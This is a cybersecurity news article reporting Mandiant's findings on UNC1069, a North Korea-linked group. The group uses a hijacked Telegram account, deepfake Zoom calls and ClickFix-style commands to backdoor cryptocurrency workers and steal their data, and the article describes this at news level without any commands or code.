TechTarget and Informa Tech’s Digital Business Combine. Dark Reading Resource Library Black Hat News Omdia Cybersecurity Advertise NEWSLETTER SIGN-UP Cybersecurity Topics World The Edge DR Technology Events Resources THREAT INTELLIGENCE DATA PRIVACY VULNERABILITIES & THREATS APPLICATION SECURITY NEWS North Korea's UNC1069 Hammers Crypto Firms With AI In moving away from traditional banks to focus on Web3 companies, the threat actor is leveraging LLMs, deepfakes, legitimate platforms, and ClickFix. Alexander Culafi, Senior News Writer, Dark Reading February 11, 2026 3 Min Read SOURCE: VALERIO ROSATI VIA ALAMY STOCK PHOTO A financially motivated North Korean threat actor is aiming at cryptocurrency firms with novel deepfake-powered social engineering strategies. Google Cloud's Mandiant this week published research concerning a threat actor it tracks as UNC1069, which has been active since at least 2018. The research primarily involves one attack in which the attacker used a compromised cryptocurrency executive's Telegram account to target a secondary victim. Attackers used the executive account to contact the victim, claiming to be the true owner of the account. "UNC1069 engaged the victim and, after building a rapport, sent a Calendly link to schedule a 30-minute meeting. The meeting link itself directed to a spoofed Zoom meeting that was hosted on the threat actor's infrastructure," Mandiant's Ross Inman and Adrian Hernandez wrote. The spoofed Zoom call was actually a video, an apparent deepfake posing as another cryptocurrency executive from another company. The video was intended to trick the user into believing they were experiencing audio issues, at which point the attacker would "help" the user troubleshoot by offering instructions. These instructions involved two sets of commands (depending on whether the target was on macOS or Windows) and would instruct the user to run a single command that would kick off the infection chain. LOADING... Related:Asia Fumbles With Throttling Back Telnet Traffic in Region This is classic ClickFix, a social engineering tactic that's gained popularity over the past year. It takes various forms but boils down to the attacker tricking the user into resolving a verification problem or troubleshooting a technical issue — generally through inputting malicious code into a command line. "Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives," Mandiant's blog post read. "This includes the use of fake Zoom meetings and a known use of AI tools by the threat actor for editing images or videos during the social engineering stage." LOADING... UNC1069 Retrains Its Sights UNC1069 is most likely connected to North Korea, according to Mandiant. Since 2023, the group has shifted its tactics away from traditional spear-phishing techniques and traditional financial companies. Its new focus: the Web3 industry, be it companies like centralized exchanges or relevant individuals at organizations like venture capital firms. Though not the most prominent threat actor conducting cryptocurrency heists, Mandiant said it remains an active threat. Related:In Bypassing MFA, ZeroDayRAT Is 'Textbook Stalkerware' What stands out is UNC1069's social engineering techniques, which in this case leveraged a legitimate executive's account on Telegram, a legitimate Calendly invitation to build a sense of authority, (most likely) deepfake videos, and ClickFix in a sophisticated (if inelegant) chain. It also relies on large language models (LLMs) like Gemini to conduct research and develop tooling for attacks. In the primary incident described in the blog, the victim ran malicious commands on their macOS device. The command installs a backdoor that enables follow-on activity, such as deployment of a downloader for additional tooling, including a second backdoor that communicates with the command server. These additional tools included two data miners to seize a swath of data from the victim's computer, including keychain credentials, browser data, Telegram user data, and Apple Notes user data. Google did not detail how UNC1069 would monetize this attack in particular, but Mandiant believes this recent incident was a targeted attack intended to enable cryptocurrency theft and to fuel "future social engineering campaigns by leveraging victim's identity and data." Related:'Reynolds' Bundles BYOVD With Ransomware Payload Organizations should take note to not run malicious code or install SDKs from third-party sources, and to verify suspicious meeting requests through a second channel (ideally in-person or over the phone). ClickFix techniques are devastating for organizations because they trick the user into compromising themselves. Even now, a couple lines of code are sometimes all it takes for complete system takeover. About the Author Alexander Culafi Senior News Writer, Dark Reading Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels. More Insights Industry Reports ThreatLabz 2025 Ransomware Report The Total Economic Impact™ Of Zscaler Private Access (ZPA) Zscaler ThreatLabz 2025 VPN Risk Report GigaOm Radar for CNAPP The Total Economic Impact™ of Google SecOps Access More Research Webinars Ransomware and the Supply Chain: A Fireside Chat with the CISOs Who Literally Wrote the Book on Third-Party Risk The Hidden AI Attack Surface: How GenAI Tools Expand Data Exposure Risk Beyond the Model: The Expanded Attack Surface of AI Agents AI-Powered Threat Hunting: Staying Ahead of Evolving Attack Patterns AI-Powered Cloud Security Posture Management More Webinars You May Also Like THREAT INTELLIGENCE OpenAI Operator Agent Used in Phishing Attack Demo by Alexander Culafi, Senior News Writer, Dark Reading MAR 13, 2025 THREAT INTELLIGENCE Stealthy Linux 'Auto-color' Backdoor Infests US Institutions by Elizabeth Montalbano, Contributing Writer FEB 26, 2025 THREAT INTELLIGENCE Trump Targets Krebs, Revokes SentinelOne Security Clearance by Kristina Beek, Associate Editor, Dark Reading APR 10, 2025 CYBERATTACKS & DATA BREACHES DeepSeek Breach Opens Floodgates to Dark Web by Emma Zaballos APR 22, 2025 Editor's Choice THREAT INTELLIGENCE EnCase Driver Weaponized as EDR Killers Persist byRob Wright FEB 5, 2026 4 MIN READ CYBERSECURITY OPERATIONS Extra Extra! Announcing DR Global Latin America byTara Seals FEB 4, 2026 2 MIN READ CYBER RISK TransUnion's Real Networks Deal Focuses on Robocall Blocking byJeffrey Schwartz FEB 9, 2026 2 MIN READ Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Ransomware and the Supply Chain: A Fireside Chat with the CISOs Who Literally Wrote the Book on Third-Party Risk THURS, FEB 19, 2026 AT1PM EST The Hidden AI Attack Surface: How GenAI Tools Expand Data Exposure Risk ON-DEMAND WEBINAR Beyond the Model: The Expanded Attack Surface of AI Agents THURS, FEB 26, 2026 AT 1PM EST AI-Powered Threat Hunting: Staying Ahead of Evolving Attack Patterns THURS, FEB 12, 2026 AT 11AM ET AI-Powered Cloud Security Posture Management WED, FEB 18,2026 AT 1:00PM EST More Webinars White Papers The Threat Prevention Buyer's Guide FInd the best AI-driven threat protection solution to stop file-based attacks. Assessing Security Architectures: Zero Trust vs. Network-Centric Models 5 Steps to Stop Ransomware With Zero Trust 10 Ways a Zero Trust Architecture Protects Against Ransomware Why Removing Admin Rights Is the Key to Better Cyber Insurance Rates eBook Explore More White Papers GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE Discover More Black Hat Omdia Working With Us About Us Advertise Reprints Join Us NEWSLETTER SIGN-UP Follow Us Copyright © 2026 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466. Home| Cookie Policy| Privacy| Terms of Use